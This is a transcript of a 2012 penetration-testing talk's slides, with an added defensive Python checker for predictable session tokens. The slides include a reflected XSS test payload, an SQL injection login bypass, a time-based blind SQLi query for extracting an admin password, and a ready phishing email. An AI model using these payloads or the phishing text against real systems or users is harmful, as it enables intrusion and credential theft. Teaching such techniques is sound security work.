Hacking the Box (Joseph Sheridan)

Speaker: Joseph Sheridan (http://goo.gl/9cMJ8)
Slides by Chris Cooper and Joseph Sheridan.

Penetration tester and ethical hacker Joseph Sheridan takes you through some of the day-to-day hacks utilised during a security engagement.

Presented at #Digibury 007.
http://deeson-online.co.uk/digibury/007

Chris Cooper

July 11, 2012

Transcript

  1. [email protected]
    Joseph Sheridan
    Started Reaction in 2009
    Locally based
    CESG CHECK registered

  2. penetration testing
    aka ethical hacking, pentesting, white hat hacking etc…
    introduction
    What is penetration testing?
    What will be covered today?

  3. penetration testing
    aka ethical hacking, pentesting, white hat hacking etc…
    Services
    • Network infrastructure
    • Web apps
    • Host build reviews
    • Wireless networks
    • Database security

  4. HACKING THE MAINFRAME
    testing network infrastructure

  5. the easy way in?
    guess passwords
    domain admin in under 30mins   < this actually happens
    password policy

  6. the easy way in?
    the awful passwords we find:
    Blank
    • SQL Server
    • Gary McKinnon blank root pentagon
    Password01
    Company name
    Football team
    Swear words
    Their own username

  7. more easiness
    look for unpatched servers
    e.g. how about an internet-facing host with no firewall and missing critical security patches
    MS04-011 / LSASS
    MS06-040 / Canonicalisation
    MS08-067 / Netapi
    MS09-050 / Negotiate Function Table

  8. MS09-050 owned over the internet

  9. password cracking
    dictionary attack
    brute-force
    rainbow tables

  10. sharing != caring
    when you have found a password for… oh, say a local administrator account
    chances of another account having the same password = HIGH

  11. HACKING THE INTERNET
    testing web applications

  12. user enumeration
    knowing a list of users makes brute-forcing significantly easier

  13. stale cookies
    a user’s account is only as secure as his session token

  14. stale cookies
    e.g. once upon a time, we found the following session token…
    MDEzODM0MDg4NzM=
    which translates from Base64 to…
    0 1 3 8 3 4 0 8 8 7 3
    always zero | random | sequential (every login)
    get any active session by enumerating through 9999 values (approx 10mins in this case)
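A check a defender can run on tokens issued to a test account to catch this pattern, added here as an example that is not from the talk: it decodes the Base64 as the slide does and labels each digit position as constant, per-login counter or random. The follow-on tokens and the 1/5/5 split are constructed assumptions; only the first token is the slide's.

```python
"""Predictable-session-token check (added example, not from the talk).

Given tokens from successive logins of one test account, in login order,
decode them as the slide does and classify each digit position as constant,
per-login counter, or variable: only the variable digits need guessing.
"""
import base64
import math

def decode_token(token: str) -> str:
    """Base64-decode a token to the ASCII digit string it carries."""
    return base64.b64decode(token).decode("ascii")

def counter_block(values):
    """Longest digit block that changes by one fixed non-zero stride
    between consecutive tokens; returns (start, end, stride) or None."""
    n, best = len(values[0]), None
    for start in range(n):
        for end in range(start + 1, n + 1):
            nums = [int(v[start:end]) for v in values]
            diffs = {b - a for a, b in zip(nums, nums[1:])}
            if len(diffs) == 1 and 0 not in diffs:
                if best is None or end - start > best[1] - best[0]:
                    best = (start, end, diffs.pop())
    return best

def assess(tokens, min_bits=64):
    """Classify positions and estimate what an attacker must still guess;
    min_bits follows OWASP session-management guidance (>= 64 bits)."""
    values = [decode_token(t) for t in tokens]
    if len(values) < 3 or len({len(v) for v in values}) != 1:
        raise ValueError("need >= 3 equal-length tokens in login order")
    n = len(values[0])
    ctr = counter_block(values)
    counter = set(range(ctr[0], ctr[1])) if ctr else set()
    constant = {i for i in range(n) if len({v[i] for v in values}) == 1} - counter
    variable = [i for i in range(n) if i not in constant and i not in counter]
    bits = len(variable) * math.log2(10)
    return {"constant": sorted(constant), "counter": sorted(counter),
            "stride": ctr[2] if ctr else None, "variable": variable,
            "entropy_bits": round(bits, 1), "weak": bits < min_bits}

# Constructed sample: the slide's token first, then fictitious follow-on
# logins (assumed split: leading 0 constant, 5 random digits, 5-digit counter).
FOLLOW_ON_LOGINS = ["07215108874", "09904608875", "02367708876"]
SAMPLE_TOKENS = ["MDEzODM0MDg4NzM="] + [
    base64.b64encode(s.encode("ascii")).decode() for s in FOLLOW_ON_LOGINS]

if __name__ == "__main__":
    print(assess(SAMPLE_TOKENS))
```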

  15. xss
    No results found for <?=$_GET["search"]?>
    http://mysite.com/?search=

  16. xss
    No results found for <?=$_GET["search"]?>
    http://mysite.com/?search=
    payload: <script>alert('xsstest')</script>

  17. xss
    No results found for <?=$_GET["search"]?>
    http://mysite.com/?search=<script>alert('xsstest')</script>
    payload: <script>alert('xsstest')</script>

  18. xss
    No results found for <script>alert('xsstest')</script><br/>
    http://mysite.com/?search=<script>alert('xsstest')</script>
    payload: <script>alert('xsstest')</script>

  19. xss
    No results found for <script>alert('xsstest')</script><br/>
    http://mysite.com/?search=<script>alert('xsstest')</script>
    payload: <script>alert('xsstest')</script>
    Alert!  xsstest

  20. SQLi
    Enter your username and password:  [joebloggs]  [*********]  Go!
    $query = "SELECT id FROM users
              WHERE uname='" . $username . "'
              AND pword='" . $password . "'";

  21. SQLi
    Enter your username and password:  [joebloggs]  [*********]  Go!
    username: joebloggs
    password: ' OR 1=1#
    $query = "SELECT id FROM users
              WHERE uname='" . $username . "'
              AND pword='" . $password . "'";

  22. SQLi
    Enter your username and password:  [joebloggs]  [*********]  Go!
    $query = "SELECT id FROM users
              WHERE uname='joebloggs'
              AND pword='' OR 1=1#'";

  23. blind SQLi
    ' and if(substring((SELECT pword FROM
      users WHERE uname='admin'), 1, 1)='a',
      benchmark(500000, MD5('!')),
      0)

  24. HACKING PEOPLE
    social engineering

  25. phishing
    From: Company IT Helpdesk
    To: Fred Jones
    Subject: IT Helpdesk Important Information – Action Required
    Dear Fred,
    We have detected suspicious activity relating to your Company account. As a precaution,
    we require you to verify your details using the password management system. Failure to do
    so may result in revocation of your user rights.
    Please copy and paste the following URL into your browser:
    http://security.company.com/pm/?verify=982364925874578955
    IT Dept. Company
    [email protected]
    This email and any files transmitted with it are confidential and are intended solely for
    the use of the individual to whom they are addressed. If you are not the intended
    recipient please notify the sender. Any unauthorised dissemination or copying of this
    email or its attachments and any use or disclosure of any information contained in them,
    is strictly prohibited.
    Please consider the environment before printing this email.

  26. phishing
    users were directed to a mirrored login on our server
    how many fell for it?
    9 / 60

  27. USB drop
    could be preloaded with malware
    or spawn outgoing connections
    leave them lying around / curiosity
    hand them in to receptionist / helpfulness

  28. EXPLOITS: THE MAKING OF
    researching software vulnerabilities

  29. buffer overflows
    ScriptFu console

  30. buffer overflows

  31. buffer overflows
    exploit contains:
    • return address
    • shellcode

  32. THE
    [email protected]
    reaction information security, canterbury